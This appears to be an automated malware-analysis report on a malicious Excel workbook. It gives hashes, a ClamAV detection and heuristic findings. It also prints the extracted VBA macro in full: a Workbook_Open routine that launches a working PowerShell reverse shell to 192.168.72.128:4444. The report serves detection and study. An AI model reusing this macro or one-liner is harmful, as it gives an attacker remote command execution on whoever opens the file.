Office (OOXML) malware analysis — malicious · e9da8dc68aeca848

MALICIOUS

Office (OOXML)

4.2 KB First seen: 2020-11-12

MD5: 746b692de4cba0c906dd62a49a591456 SHA-1: 3475000ba23a305f1ba31e306e4e91113e7223e7 SHA-256: e9da8dc68aeca848c8a74570f9e0f556af20523f22720da060ff66f17a56da7a

268 Risk Score

Heuristics 5

ClamAV: Xls.Dropper.EPPlus-9802867-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    TaskID = Shell(Program, 1)
```

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

    Program = "powershell.exe -exec bypass  $client = New-Object System.Net.Sockets.TCPClient('192.168.72.128',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$se …

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1386 bytes
SHA-256: `2c443b019cc1eece47ff8b8ffeb20406fec7a57b88765ec796c1123c70a2f564`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() Dim Program As String Dim TaskID As Double On Error Resume Next Program = "powershell.exe -exec bypass $client = New-Object System.Net.Sockets.TCPClient('192.168.72.128',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 \| Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" TaskID = Shell(Program, 1) If Err <> 0 Then MsgBox "Can't start " & Program End If End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	5120 bytes
SHA-256: `8293ffb51d3530fc58c34c78a651c81f7b08684e768843e5ea307ea1ea575588`
Detection ClamAV: Xls.Dropper.EPPlus-9802867-2 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.